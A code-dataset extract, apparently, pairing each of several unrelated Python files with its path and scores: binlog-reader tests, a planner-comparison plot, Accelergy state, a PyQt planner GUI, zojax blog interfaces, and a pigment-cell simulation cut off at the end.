assert replication_event.event == result.event
assert replication_event.position.gtid == result.position.gtid
assert replication_event.position.offset == result.position.offset
def test_meteorite_and_sensu_alert(
self,
mock_db_connections,
patch_stream
):
if not SimpleBinlogStreamReaderWrapper.is_meteorite_sensu_supported():
pytest.skip("meteorite and sensu are unsupported in open source version.")
from data_pipeline.tools.meteorite_gauge_manager import MeteoriteGaugeManager
from data_pipeline.tools.sensu_alert_manager import SensuAlertManager
with mock.patch.object(
MeteoriteGaugeManager,
'periodic_process'
) as mock_meteorite, mock.patch.object(
SensuAlertManager,
'periodic_process'
) as mock_sensu_alert:
stream, results = self._setup_stream_and_expected_result(
mock_db_connections.source_database_config,
mock_db_connections.tracker_database_config,
patch_stream
)
assert mock_meteorite.call_count == 1
assert mock_sensu_alert.call_count == 1
def test_yield_event_with_heartbeat_event(
self,
mock_db_connections,
patch_stream,
):
stream, results = self._setup_stream_and_expected_result(
mock_db_connections.source_database_config,
mock_db_connections.tracker_database_config,
patch_stream
)
for replication_event, result in zip(stream, results):
assert replication_event.event == result.event
assert replication_event.position.log_pos == result.position.log_pos
assert replication_event.position.log_file == result.position.log_file
assert replication_event.position.offset == result.position.offset
assert replication_event.position.hb_serial == result.position.hb_serial
assert replication_event.position.hb_timestamp == result.position.hb_timestamp
def _setup_stream_and_expected_result(
self,
source_database_config,
tracker_database_config,
patch_stream
):
log_pos = 10
log_file = "binlog.001"
row = {"after_values": {
"serial": 123,
# This timestamp is Wed, 21 Oct 2015 12:05:27 GMT
"timestamp": datetime.fromtimestamp(1445429127)
}}
heartbeat_event = mock.Mock(
spec=DataEvent,
schema='yelp_heartbeat',
log_pos=log_pos,
log_file=log_file,
row=row
)
data_event_0 = mock.Mock(spec=DataEvent, table="business", schema="yelp")
data_event_1 = mock.Mock(spec=DataEvent, table="business", schema="yelp")
data_event_2 = mock.Mock(spec=DataEvent, table="business", schema="yelp")
event_list = [
heartbeat_event,
data_event_0,
data_event_1,
data_event_2,
]
patch_stream.return_value.peek.side_effect = event_list
patch_stream.return_value.pop.side_effect = event_list
stream = SimpleBinlogStreamReaderWrapper(
source_database_config,
tracker_database_config,
LogPosition(
log_pos=log_pos,
log_file=log_file,
offset=0
),
gtid_enabled=False,
)
# Since the offset is 0, so the result should start offset 1, and skip
# data_event_0 which is at offset 0.
results = [
ReplicationHandlerEvent(
event=data_event_1,
position=LogPosition(
log_pos=log_pos,
log_file=log_file,
offset=1,
hb_serial=123,
# This is Wed, 21 Oct 2015 12:05:27 GMT
hb_timestamp=1445429127,
)
),
ReplicationHandlerEvent(
event=data_event_2,
position=LogPosition(
log_pos=log_pos,
log_file=log_file,
offset=2,
hb_serial=123,
# This is Wed, 21 Oct 2015 12:05:27 GMT
hb_timestamp=1445429127,
)
)
]
return stream, results | tests/components/simple_binlog_stream_reader_wrapper_test.py | from __future__ import absolute_import
from __future__ import unicode_literals
from datetime import datetime
import mock
import pytest
from pymysqlreplication.event import GtidEvent
from pymysqlreplication.event import QueryEvent
from replication_handler.components.simple_binlog_stream_reader_wrapper import SimpleBinlogStreamReaderWrapper
from replication_handler.util.misc import DataEvent
from replication_handler.util.misc import ReplicationHandlerEvent
from replication_handler.util.position import GtidPosition
from replication_handler.util.position import LogPosition
class TestSimpleBinlogStreamReaderWrapper(object):
@pytest.yield_fixture
def patch_stream(self):
with mock.patch(
'replication_handler.components.simple_binlog_stream_reader_wrapper.LowLevelBinlogStreamReaderWrapper'
) as mock_stream:
yield mock_stream
def test_yield_events_when_gtid_enabled(self, mock_db_connections, patch_stream):
gtid_event_0 = mock.Mock(spec=GtidEvent, gtid="sid:11")
query_event_0 = mock.Mock(spec=QueryEvent)
query_event_1 = mock.Mock(spec=QueryEvent)
gtid_event_1 = mock.Mock(spec=GtidEvent, gtid="sid:12")
data_event_0 = mock.Mock(spec=DataEvent)
data_event_1 = mock.Mock(spec=DataEvent)
data_event_2 = mock.Mock(spec=DataEvent)
event_list = [
gtid_event_0,
query_event_0,
data_event_0,
data_event_1,
data_event_2,
gtid_event_1,
query_event_1,
]
patch_stream.return_value.peek.side_effect = event_list
patch_stream.return_value.pop.side_effect = event_list
# set offset to 1, meaning we want to skip event at offset 0
stream = SimpleBinlogStreamReaderWrapper(
mock_db_connections.source_database_config,
mock_db_connections.tracker_database_config,
GtidPosition(
gtid="sid:10",
offset=1
),
gtid_enabled=True
)
results = [
ReplicationHandlerEvent(
event=data_event_1,
position=GtidPosition(gtid="sid:11", offset=2)
),
ReplicationHandlerEvent(
event=data_event_2,
position=GtidPosition(gtid="sid:11", offset=3)
),
ReplicationHandlerEvent(
event=query_event_1,
position=GtidPosition(gtid="sid:12", offset=0)
)
]
for replication_event, result in zip(stream, results):
assert replication_event.event == result.event
assert replication_event.position.gtid == result.position.gtid
assert replication_event.position.offset == result.position.offset
def test_meteorite_and_sensu_alert(
self,
mock_db_connections,
patch_stream
):
if not SimpleBinlogStreamReaderWrapper.is_meteorite_sensu_supported():
pytest.skip("meteorite and sensu are unsupported in open source version.")
from data_pipeline.tools.meteorite_gauge_manager import MeteoriteGaugeManager
from data_pipeline.tools.sensu_alert_manager import SensuAlertManager
with mock.patch.object(
MeteoriteGaugeManager,
'periodic_process'
) as mock_meteorite, mock.patch.object(
SensuAlertManager,
'periodic_process'
) as mock_sensu_alert:
stream, results = self._setup_stream_and_expected_result(
mock_db_connections.source_database_config,
mock_db_connections.tracker_database_config,
patch_stream
)
assert mock_meteorite.call_count == 1
assert mock_sensu_alert.call_count == 1
def test_yield_event_with_heartbeat_event(
self,
mock_db_connections,
patch_stream,
):
stream, results = self._setup_stream_and_expected_result(
mock_db_connections.source_database_config,
mock_db_connections.tracker_database_config,
patch_stream
)
for replication_event, result in zip(stream, results):
assert replication_event.event == result.event
assert replication_event.position.log_pos == result.position.log_pos
assert replication_event.position.log_file == result.position.log_file
assert replication_event.position.offset == result.position.offset
assert replication_event.position.hb_serial == result.position.hb_serial
assert replication_event.position.hb_timestamp == result.position.hb_timestamp
def _setup_stream_and_expected_result(
self,
source_database_config,
tracker_database_config,
patch_stream
):
log_pos = 10
log_file = "binlog.001"
row = {"after_values": {
"serial": 123,
# This timestamp is Wed, 21 Oct 2015 12:05:27 GMT
"timestamp": datetime.fromtimestamp(1445429127)
}}
heartbeat_event = mock.Mock(
spec=DataEvent,
schema='yelp_heartbeat',
log_pos=log_pos,
log_file=log_file,
row=row
)
data_event_0 = mock.Mock(spec=DataEvent, table="business", schema="yelp")
data_event_1 = mock.Mock(spec=DataEvent, table="business", schema="yelp")
data_event_2 = mock.Mock(spec=DataEvent, table="business", schema="yelp")
event_list = [
heartbeat_event,
data_event_0,
data_event_1,
data_event_2,
]
patch_stream.return_value.peek.side_effect = event_list
patch_stream.return_value.pop.side_effect = event_list
stream = SimpleBinlogStreamReaderWrapper(
source_database_config,
tracker_database_config,
LogPosition(
log_pos=log_pos,
log_file=log_file,
offset=0
),
gtid_enabled=False,
)
# Since the offset is 0, so the result should start offset 1, and skip
# data_event_0 which is at offset 0.
results = [
ReplicationHandlerEvent(
event=data_event_1,
position=LogPosition(
log_pos=log_pos,
log_file=log_file,
offset=1,
hb_serial=123,
# This is Wed, 21 Oct 2015 12:05:27 GMT
hb_timestamp=1445429127,
)
),
ReplicationHandlerEvent(
event=data_event_2,
position=LogPosition(
log_pos=log_pos,
log_file=log_file,
offset=2,
hb_serial=123,
# This is Wed, 21 Oct 2015 12:05:27 GMT
hb_timestamp=1445429127,
)
)
]
return stream, results | 0.644001 | 0.236153 |
import numpy as np
import json
import os
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import matplotlib.patches as mpatches
from matplotlib.patches import Patch
from matplotlib.lines import Line2D
pink = '#EC6779'
green = '#288737'
blue = '#4678a8'
yellow = '#CBBA4E'
cyan = '#6BCCeC'
magenta = '#A83676'
nameA = "ours_stonehenge_compare1"
nameB = "rrt_stonehenge_compare1"
nameC = "minsnap_stonehenge_compare1"
names = [nameA, nameB, nameC]
pretty_names = ["Ours", "RRT", "Min Snap"]
# fig = plt.figure(figsize=plt.figaspect(8/11))
# fig = plt.figure(figsize=(11,8))
# ax = fig.add_subplot(1, 1, 1)
def get_latest_train(name):
save_number = 0
while True:
filepath = 'experiments/' + name + '/train/' +str(save_number)+".json"
# print(filepath)
if not os.path.isfile(filepath):
if save_number == 0:
assert False, "can't find any trajectory"
save_number -= 1
filepath = 'experiments/' + name + '/train/' +str(save_number)+".json"
return filepath
save_number+=1
def mean(array):
return sum(array)/len(array)
collision = []
control = []
handles =[]
# ax_twin = ax.twinx()
for name in names:
data = json.load(open(get_latest_train(name)))
print(name, "total", mean(data['total_cost']))
print(name, "colision", mean(data['colision_loss']))
collision.append(mean(data['colision_loss']))
control.append(mean(data['total_cost']) - mean(data['colision_loss'] ))
# ax.plot(data['total_cost'], c =color, linestyle='--', linewidth =3)
# ax_twin.plot(data['colision_loss'], c=color, linewidth =3)
# patch = mpatches.Patch(color=color, label = name)
# handles.append(patch)
fig = plt.figure(figsize=(11,8))
left_ax = fig.add_subplot(1, 1, 1)
right_ax = left_ax.twinx()
legend_elements = []
ind = np.arange(len(control))
width = 0.35
left_ax.bar(ind, collision, width, label='Collision', color=pink, log=True)
legend_elements.append( Patch(facecolor=pink, label='Collision') )
right_ax.bar(ind + width, control, width, label='Control', color=green, log=True)
legend_elements.append( Patch(facecolor=green, label='Control') )
left_ax.set_ylabel('NeRF Collision Cost', fontsize=30)
right_ax.set_ylabel('Contorl Effort', fontsize=30)
plt.title('Planner Comparision', fontsize=30)
plt.xticks(ind + width / 2, tuple(pretty_names) , fontsize=30)
left_ax.set_xticklabels(tuple(pretty_names), rotation=0, fontsize=30)
# left_ax.legend(loc='best')
# right_ax.legend(loc='best')
plt.legend(handles=legend_elements, prop={"size":20} , loc=2)
plt.show() | tools/plot_planner_compare.py | import numpy as np
import json
import os
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import matplotlib.patches as mpatches
from matplotlib.patches import Patch
from matplotlib.lines import Line2D
pink = '#EC6779'
green = '#288737'
blue = '#4678a8'
yellow = '#CBBA4E'
cyan = '#6BCCeC'
magenta = '#A83676'
nameA = "ours_stonehenge_compare1"
nameB = "rrt_stonehenge_compare1"
nameC = "minsnap_stonehenge_compare1"
names = [nameA, nameB, nameC]
pretty_names = ["Ours", "RRT", "Min Snap"]
# fig = plt.figure(figsize=plt.figaspect(8/11))
# fig = plt.figure(figsize=(11,8))
# ax = fig.add_subplot(1, 1, 1)
def get_latest_train(name):
save_number = 0
while True:
filepath = 'experiments/' + name + '/train/' +str(save_number)+".json"
# print(filepath)
if not os.path.isfile(filepath):
if save_number == 0:
assert False, "can't find any trajectory"
save_number -= 1
filepath = 'experiments/' + name + '/train/' +str(save_number)+".json"
return filepath
save_number+=1
def mean(array):
return sum(array)/len(array)
collision = []
control = []
handles =[]
# ax_twin = ax.twinx()
for name in names:
data = json.load(open(get_latest_train(name)))
print(name, "total", mean(data['total_cost']))
print(name, "colision", mean(data['colision_loss']))
collision.append(mean(data['colision_loss']))
control.append(mean(data['total_cost']) - mean(data['colision_loss'] ))
# ax.plot(data['total_cost'], c =color, linestyle='--', linewidth =3)
# ax_twin.plot(data['colision_loss'], c=color, linewidth =3)
# patch = mpatches.Patch(color=color, label = name)
# handles.append(patch)
fig = plt.figure(figsize=(11,8))
left_ax = fig.add_subplot(1, 1, 1)
right_ax = left_ax.twinx()
legend_elements = []
ind = np.arange(len(control))
width = 0.35
left_ax.bar(ind, collision, width, label='Collision', color=pink, log=True)
legend_elements.append( Patch(facecolor=pink, label='Collision') )
right_ax.bar(ind + width, control, width, label='Control', color=green, log=True)
legend_elements.append( Patch(facecolor=green, label='Control') )
left_ax.set_ylabel('NeRF Collision Cost', fontsize=30)
right_ax.set_ylabel('Contorl Effort', fontsize=30)
plt.title('Planner Comparision', fontsize=30)
plt.xticks(ind + width / 2, tuple(pretty_names) , fontsize=30)
left_ax.set_xticklabels(tuple(pretty_names), rotation=0, fontsize=30)
# left_ax.legend(loc='best')
# right_ax.legend(loc='best')
plt.legend(handles=legend_elements, prop={"size":20} , loc=2)
plt.show() | 0.400046 | 0.382776 |
from accelergy.utils import *
class SystemState():
def __init__(self):
self.cc_classes = {}
self.pc_classes = {}
self.arch_spec = None
self.hier_arch_spec = None
self.ccs = {}
self.pcs = {}
self.action_counts = None
self.plug_ins = []
self.ERT = None
self.ART = None
self.parser_version = None
self.flags = {}
self.energy_estimations = None
def set_flag_s(self, flag_name_val_dict):
self.flags.update(flag_name_val_dict)
def set_accelergy_version(self, version):
self.parser_version = version
def set_hier_arch_spec(self, arch_dict):
ASSERT_MSG(self.hier_arch_spec is None, 'interpreted input arch is set')
self.hier_arch_spec = arch_dict
def set_arch_spec(self, arch_spec):
ASSERT_MSG(self.arch_spec is None, 'architecture spec is already set')
self.arch_spec = arch_spec
def add_cc_class(self, cc_class):
cc_class_name = cc_class.get_name()
ASSERT_MSG(cc_class_name not in self.cc_classes, '%s compound class is already added'%(cc_class_name))
self.cc_classes[cc_class_name] = cc_class
def add_pc_class(self, pc_class):
pc_class_name = pc_class.get_name()
ASSERT_MSG(pc_class_name not in self.pc_classes, '%s primitive class is already added'%(pc_class_name))
self.pc_classes[pc_class_name] = pc_class
def add_cc(self, cc):
cc_name = cc.get_name()
ASSERT_MSG(cc_name not in self.ccs, '%s compound component is already added'%(cc_name))
self.ccs[cc_name] = cc
def add_pc(self, pc):
pc_name = pc.get_name()
ASSERT_MSG(pc_name not in self.ccs, '%s compound component is already added'%(pc_name))
self.pcs[pc_name] = pc
def add_plug_ins(self, plug_ins):
ASSERT_MSG(type(plug_ins) is list, 'plug in objects need to be passed in as a list')
self.plug_ins = plug_ins
def set_ERT(self, ERT):
self.ERT = ERT
def set_ART(self, ART):
self.ART = ART
def set_action_counts(self, action_counts):
self.action_counts = action_counts
def set_energy_estimations(self, energy_estimations):
self.energy_estimations = energy_estimations | accelergy/system_state.py | from accelergy.utils import *
class SystemState():
def __init__(self):
self.cc_classes = {}
self.pc_classes = {}
self.arch_spec = None
self.hier_arch_spec = None
self.ccs = {}
self.pcs = {}
self.action_counts = None
self.plug_ins = []
self.ERT = None
self.ART = None
self.parser_version = None
self.flags = {}
self.energy_estimations = None
def set_flag_s(self, flag_name_val_dict):
self.flags.update(flag_name_val_dict)
def set_accelergy_version(self, version):
self.parser_version = version
def set_hier_arch_spec(self, arch_dict):
ASSERT_MSG(self.hier_arch_spec is None, 'interpreted input arch is set')
self.hier_arch_spec = arch_dict
def set_arch_spec(self, arch_spec):
ASSERT_MSG(self.arch_spec is None, 'architecture spec is already set')
self.arch_spec = arch_spec
def add_cc_class(self, cc_class):
cc_class_name = cc_class.get_name()
ASSERT_MSG(cc_class_name not in self.cc_classes, '%s compound class is already added'%(cc_class_name))
self.cc_classes[cc_class_name] = cc_class
def add_pc_class(self, pc_class):
pc_class_name = pc_class.get_name()
ASSERT_MSG(pc_class_name not in self.pc_classes, '%s primitive class is already added'%(pc_class_name))
self.pc_classes[pc_class_name] = pc_class
def add_cc(self, cc):
cc_name = cc.get_name()
ASSERT_MSG(cc_name not in self.ccs, '%s compound component is already added'%(cc_name))
self.ccs[cc_name] = cc
def add_pc(self, pc):
pc_name = pc.get_name()
ASSERT_MSG(pc_name not in self.ccs, '%s compound component is already added'%(pc_name))
self.pcs[pc_name] = pc
def add_plug_ins(self, plug_ins):
ASSERT_MSG(type(plug_ins) is list, 'plug in objects need to be passed in as a list')
self.plug_ins = plug_ins
def set_ERT(self, ERT):
self.ERT = ERT
def set_ART(self, ART):
self.ART = ART
def set_action_counts(self, action_counts):
self.action_counts = action_counts
def set_energy_estimations(self, energy_estimations):
self.energy_estimations = energy_estimations | 0.531939 | 0.14624 |
import sys
from PyQt5.QtWidgets import (
QWidget,
QPushButton,
QHBoxLayout,
QVBoxLayout,
QApplication,
QMainWindow,
QAction,
QGridLayout,
QScrollArea,
QLabel,
QListWidget,
QListWidgetItem,
QAbstractItemView,
QLineEdit,
QDateEdit,
QCheckBox
)
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt, QDateTime
from task import Task
app = QApplication(sys.argv)
class NewTaskWidget(QWidget):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.h = QHBoxLayout(self)
self.subject = QLineEdit("Subject:")
self.h.addWidget(self.subject)
self.what = QLineEdit("What:")
self.h.addWidget(self.what)
self.deadline = QDateEdit(calendarPopup=True)
self.h.addWidget(self.deadline)
self.deadline.setDateTime(QDateTime.currentDateTime())
self.info = QLabel("Mark as important:")
self.h.addWidget(self.info)
self.important = QCheckBox()
self.h.addWidget(self.important)
self.submitbutton = QPushButton("Submit")
self.submitbutton.clicked.connect(self.submit)
self.h.addWidget(self.submitbutton)
self.setLayout(self.h)
def submit(self):
# Creates new Task
subject = self.subject.text
what = self.what.text
deadline = self.deadline.date()
important = self.important.isChecked()
newtask = Task(subject, what, deadline, important)
# Todo: Add Task to QListWidget, save task
class TasksWidget(QWidget):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.h = QHBoxLayout(self)
self.scroll = QScrollArea()
self.scroll.setWidgetResizable(True)
self.scrollcontent = QListWidget(self.scroll)
for i in range(20):
a = QListWidgetItem(str(i))
self.scrollcontent.addItem(a)
self.scroll.setWidget(self.scrollcontent)
self.h.addWidget(self.scroll)
self.setLayout(self.h)
class MainWidget(QWidget):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.v = QVBoxLayout(self)
self.v.addWidget(QLabel("Create new Task:"))
self.v.addWidget(NewTaskWidget())
self.v.addWidget(QLabel("Tasks:"))
self.v.addWidget(TasksWidget())
self.setLayout(self.v)
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.setWindowTitle("Homeworkplanner") # Change later to better name
# self.setWindowIcon(QIcon("someIcon.png"))
self.main = MainWidget()
self.setCentralWidget(self.main)
self.show()
# opens the Window
w = MainWindow()
# Closes App when Window is closed
sys.exit(app.exec_()) | main.py | import sys
from PyQt5.QtWidgets import (
QWidget,
QPushButton,
QHBoxLayout,
QVBoxLayout,
QApplication,
QMainWindow,
QAction,
QGridLayout,
QScrollArea,
QLabel,
QListWidget,
QListWidgetItem,
QAbstractItemView,
QLineEdit,
QDateEdit,
QCheckBox
)
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt, QDateTime
from task import Task
app = QApplication(sys.argv)
class NewTaskWidget(QWidget):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.h = QHBoxLayout(self)
self.subject = QLineEdit("Subject:")
self.h.addWidget(self.subject)
self.what = QLineEdit("What:")
self.h.addWidget(self.what)
self.deadline = QDateEdit(calendarPopup=True)
self.h.addWidget(self.deadline)
self.deadline.setDateTime(QDateTime.currentDateTime())
self.info = QLabel("Mark as important:")
self.h.addWidget(self.info)
self.important = QCheckBox()
self.h.addWidget(self.important)
self.submitbutton = QPushButton("Submit")
self.submitbutton.clicked.connect(self.submit)
self.h.addWidget(self.submitbutton)
self.setLayout(self.h)
def submit(self):
# Creates new Task
subject = self.subject.text
what = self.what.text
deadline = self.deadline.date()
important = self.important.isChecked()
newtask = Task(subject, what, deadline, important)
# Todo: Add Task to QListWidget, save task
class TasksWidget(QWidget):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.h = QHBoxLayout(self)
self.scroll = QScrollArea()
self.scroll.setWidgetResizable(True)
self.scrollcontent = QListWidget(self.scroll)
for i in range(20):
a = QListWidgetItem(str(i))
self.scrollcontent.addItem(a)
self.scroll.setWidget(self.scrollcontent)
self.h.addWidget(self.scroll)
self.setLayout(self.h)
class MainWidget(QWidget):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.v = QVBoxLayout(self)
self.v.addWidget(QLabel("Create new Task:"))
self.v.addWidget(NewTaskWidget())
self.v.addWidget(QLabel("Tasks:"))
self.v.addWidget(TasksWidget())
self.setLayout(self.v)
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.setWindowTitle("Homeworkplanner") # Change later to better name
# self.setWindowIcon(QIcon("someIcon.png"))
self.main = MainWidget()
self.setCentralWidget(self.main)
self.show()
# opens the Window
w = MainWindow()
# Closes App when Window is closed
sys.exit(app.exec_()) | 0.197251 | 0.064095 |
from zope import interface, schema
from zope.i18nmessageid import MessageFactory
from zojax.content.feeds.interfaces import IRSS2Feed
from zojax.content.type.interfaces import IItem, IContent
from zojax.content.space.interfaces import IWorkspace, IWorkspaceFactory
from zojax.content.notifications.interfaces import IContentNotification
from zojax.filefield.field import ImageField
from zojax.richtext.field import RichText
from zojax.security.interfaces import IPermissionCategory
from zojax.widget.checkbox.field import CheckboxList
_ = MessageFactory('zojax.blogger')
class IBlog(IItem):
""" Blog """
dates = interface.Attribute('Dates')
index = interface.Attribute('Primary index')
pageSize = schema.Int(
title=_(u'Page size'),
description=_(u'Number of entries per page.'),
default=10)
def entries():
"""List entries names."""
class IBlogPostListing(interface.Interface):
"""Blog post listing"""
def update(post):
"""Update post index."""
def remove(post, name):
"""Remove post from index."""
class IBlogPost(interface.Interface):
""" Blog post """
title = schema.TextLine(
title=_(u'Title'),
description=_(u'Post title.'),
default=u'',
missing_value=u'',
required=True)
text = RichText(
title=_(u'Text'),
description=_(u'Blog post body text.'),
required=True)
abstract = RichText(
title=_(u'Abstract'),
description=_(u'Blog post abstract text.'),
required=True)
image = ImageField(
title=_(u'Image'),
description=_(u'Image for Blog post.'),
required=False)
date = schema.Datetime(
title=_('Publish Date / Time'),
description=_('Post date.'),
required=True)
category = CheckboxList(
title=_(u'Category'),
description=_('Select category for blog post.'),
vocabulary='zojax.blogger-categories',
default=[],
required=False)
published = schema.Bool(
title=_(u'Published'),
default=None,
required=False
)
class IBlogPostType(interface.Interface):
""" Blog post content type """
class ICategory(IItem):
""" Entries Category """
class ICategoryContainer(interface.Interface):
""" Categories container """
class IBloggerProduct(interface.Interface):
""" product """
usePostAbstractField = schema.Bool(
title=_(u'Use post abstract field'),
description=_(u'Use post abstract field on post view.'),
default=False)
class IBlogPostView(interface.Interface):
""" Blog post view """
class IYear(IContent):
""" interface for year """
class IMonth(IContent):
""" interface for month """
class IBlogTags(interface.Interface):
""" blog tags """
engine = interface.Attribute('Tags engine')
def hasTag(tag):
""" """
def listTags(post):
"""Return list of tags"""
class IBlogTagsManager(interface.Interface):
""" manage blog tags """
def update(post):
"""Update tags for post."""
def remove(post):
"""Remove tags for post."""
class IBloggerWorkspace(IBlog, IWorkspace):
""" blogger workspace """
class IBloggerWorkspaceFactory(IWorkspaceFactory):
""" blogger workspace factory """
class ISpaceBloggerWorkspaceFactory(IBloggerWorkspaceFactory):
""" blogger workspace factory """
class IBlogPostsRSSFeed(IRSS2Feed):
""" blog posts rss feed """
class IBlogNotification(IContentNotification):
""" blog notification """
class IBloggerPermissions(IPermissionCategory):
""" blog permissions """
class IBlogPostPage(interface.Interface):
title = interface.Attribute("Object's Title")
text = RichText(
title=_(u'Text'),
description=_(u'Blog post body text.'),
required=False)
position = schema.TextLine(
title=_(u'Position'),
required=False)
class IAdvancedBlogPost(IBlogPost):
""" Advanced Blog post """
text = interface.Attribute("Object's Text")
pages = schema.List(
title=_(u"Pages"),
value_type=schema.Object(
title=_(u'page'),
schema=IBlogPostPage),
default=[],
required=True) | src/zojax/blogger/interfaces.py | from zope import interface, schema
from zope.i18nmessageid import MessageFactory
from zojax.content.feeds.interfaces import IRSS2Feed
from zojax.content.type.interfaces import IItem, IContent
from zojax.content.space.interfaces import IWorkspace, IWorkspaceFactory
from zojax.content.notifications.interfaces import IContentNotification
from zojax.filefield.field import ImageField
from zojax.richtext.field import RichText
from zojax.security.interfaces import IPermissionCategory
from zojax.widget.checkbox.field import CheckboxList
_ = MessageFactory('zojax.blogger')
class IBlog(IItem):
""" Blog """
dates = interface.Attribute('Dates')
index = interface.Attribute('Primary index')
pageSize = schema.Int(
title=_(u'Page size'),
description=_(u'Number of entries per page.'),
default=10)
def entries():
"""List entries names."""
class IBlogPostListing(interface.Interface):
"""Blog post listing"""
def update(post):
"""Update post index."""
def remove(post, name):
"""Remove post from index."""
class IBlogPost(interface.Interface):
""" Blog post """
title = schema.TextLine(
title=_(u'Title'),
description=_(u'Post title.'),
default=u'',
missing_value=u'',
required=True)
text = RichText(
title=_(u'Text'),
description=_(u'Blog post body text.'),
required=True)
abstract = RichText(
title=_(u'Abstract'),
description=_(u'Blog post abstract text.'),
required=True)
image = ImageField(
title=_(u'Image'),
description=_(u'Image for Blog post.'),
required=False)
date = schema.Datetime(
title=_('Publish Date / Time'),
description=_('Post date.'),
required=True)
category = CheckboxList(
title=_(u'Category'),
description=_('Select category for blog post.'),
vocabulary='zojax.blogger-categories',
default=[],
required=False)
published = schema.Bool(
title=_(u'Published'),
default=None,
required=False
)
class IBlogPostType(interface.Interface):
""" Blog post content type """
class ICategory(IItem):
""" Entries Category """
class ICategoryContainer(interface.Interface):
""" Categories container """
class IBloggerProduct(interface.Interface):
""" product """
usePostAbstractField = schema.Bool(
title=_(u'Use post abstract field'),
description=_(u'Use post abstract field on post view.'),
default=False)
class IBlogPostView(interface.Interface):
""" Blog post view """
class IYear(IContent):
""" interface for year """
class IMonth(IContent):
""" interface for month """
class IBlogTags(interface.Interface):
""" blog tags """
engine = interface.Attribute('Tags engine')
def hasTag(tag):
""" """
def listTags(post):
"""Return list of tags"""
class IBlogTagsManager(interface.Interface):
""" manage blog tags """
def update(post):
"""Update tags for post."""
def remove(post):
"""Remove tags for post."""
class IBloggerWorkspace(IBlog, IWorkspace):
""" blogger workspace """
class IBloggerWorkspaceFactory(IWorkspaceFactory):
""" blogger workspace factory """
class ISpaceBloggerWorkspaceFactory(IBloggerWorkspaceFactory):
""" blogger workspace factory """
class IBlogPostsRSSFeed(IRSS2Feed):
""" blog posts rss feed """
class IBlogNotification(IContentNotification):
""" blog notification """
class IBloggerPermissions(IPermissionCategory):
""" blog permissions """
class IBlogPostPage(interface.Interface):
title = interface.Attribute("Object's Title")
text = RichText(
title=_(u'Text'),
description=_(u'Blog post body text.'),
required=False)
position = schema.TextLine(
title=_(u'Position'),
required=False)
class IAdvancedBlogPost(IBlogPost):
""" Advanced Blog post """
text = interface.Attribute("Object's Text")
pages = schema.List(
title=_(u"Pages"),
value_type=schema.Object(
title=_(u'page'),
schema=IBlogPostPage),
default=[],
required=True) | 0.603114 | 0.148541 |
from datetime import datetime
import numpy as np
import matplotlib.pyplot as plt
import math
import random
from initialize import initcond, neighbors
def sim_parameters():
"""This function defines the initial parameters used in simulations"""
global rows, cols, h, per_cycle, num_cycles
rows = 100
cols = 100
h = 15
per_cycle = 10**7
num_cycles = 10**2
def reaction_rates():
"""This function defines the reaction rates for each process"""
global bx, bm, dx, dm, sm, sx, lx
bx = 1 # birth of xantophores
bm = 0 # birth of melanophores
dx = 0 # death of xantophores
dm = 0 # death of melanophores
sm = 1 # short-range killing of xantophore by melanophore
sx = 1 # short-range killing of melanophore by xantophore
lx = 2.5 # long-range activation/birth strength
return
def sim_setup(row=100, col=100):
"""This function sets up the initial simulations, calling initial conditions and neighbors"""
array, irid = initcond.basic(row, col)
up, down, left, right = neighbors.calc4neighbors(row, col)
return array, irid, up, down, left, right
def run_sim(array, irid, up, down, left, right, h=15, num_loops=10**2, per_loop=10**7):
"""This function runs the simulations and outputs the final matrix"""
total = bx + bm + dx + dm + sm + sx + lx
P_bx = bx/total
P_bm = bm/total
P_dx = dx/total
P_dm = dm/total
P_sm = sm/total
P_sx = sx/total
P_lx = lx/total
for loop in range(num_loops):
idx0 = np.random.randint(low=0, high=rows, size=per_loop, dtype=np.uint8)
idx1 = np.random.randint(low=0, high=cols, size=per_loop, dtype=np.uint8)
process = np.random.rand(per_loop)
for n in range(per_loop):
pn = process[n]
location = (idx0[n], idx1[n])
well = array[location]
if pn < P_lx:
if (well == 0) & (~ irid[location]):
angle = random.random() * 2 * math.pi
cosangle = math.cos(angle)
sinangle = math.sin(angle)
i_new = np.around(location[0] + cosangle * h, decimals=0) % array.shape[0]
j_new = np.around(location[1] + sinangle * h, decimals=0) % array.shape[1]
if array[int(i_new), int(j_new)] == 1:
array[location] = 2 # has melanophore form distance away
elif pn < P_lx + P_sx:
if (well == 2):
neigh = ['u', 'd', 'l', 'r']
choice = random.choice(neigh)
if choice == 'u': # chooses neighboring value
neigh_val = array[up[location], location[1]]
elif choice == 'd':
neigh_val = array[down[location], location[1]]
elif choice == 'l':
neigh_val = array[location[0], left[location]]
else:
neigh_val = array[location[0], right[location]]
if neigh_val == 1:
array[location] = 0 # kills melanophore
elif pn < P_lx + P_sx + P_sm:
if (well == 1):
neigh = ['u', 'd', 'l', 'r']
choice = random.choice(neigh)
if choice == 'u': # chooses neighboring value
neigh_val = array[up[location], location[1]]
elif choice == 'd':
neigh_val = array[down[location], location[1]]
elif choice == 'l':
neigh_val = array[location[0], left[location]]
else:
neigh_val = array[location[0], right[location]]
if neigh_val == 2:
array[location] = 0 # kills xantophore
elif pn < P_lx + P_sx + P_sm + P_bx:
if well == 0:
array[location] = 1 # births xantophore
elif pn < P_lx + P_sx + P_sm + P_bx + P_bm:
if well == 0:
array[location] = 2 # births melanophore
elif pn < P_lx + P_sx + P_sm + P_bx + P_bm + P_dx:
if well == 1:
array[location] = 0 # kills xantophore
elif pn < P_lx + P_sx + P_sm + P_bx + P_bm + P_dx + P_dm:
if well == 2:
array[location] = 0 # kills melanophore
return array
def plotter(array):
"""This function plots the arrays in a similar manner to the original paper:
Yellow pixels are xantophores
Black pixels are melanophores
White pixels are empty
"""
img = np.empty((array.shape[0], array.shape[1], 3), dtype=np.float32)
img[array == 0, :] = [1, 1, 1] # sets empty cells to white
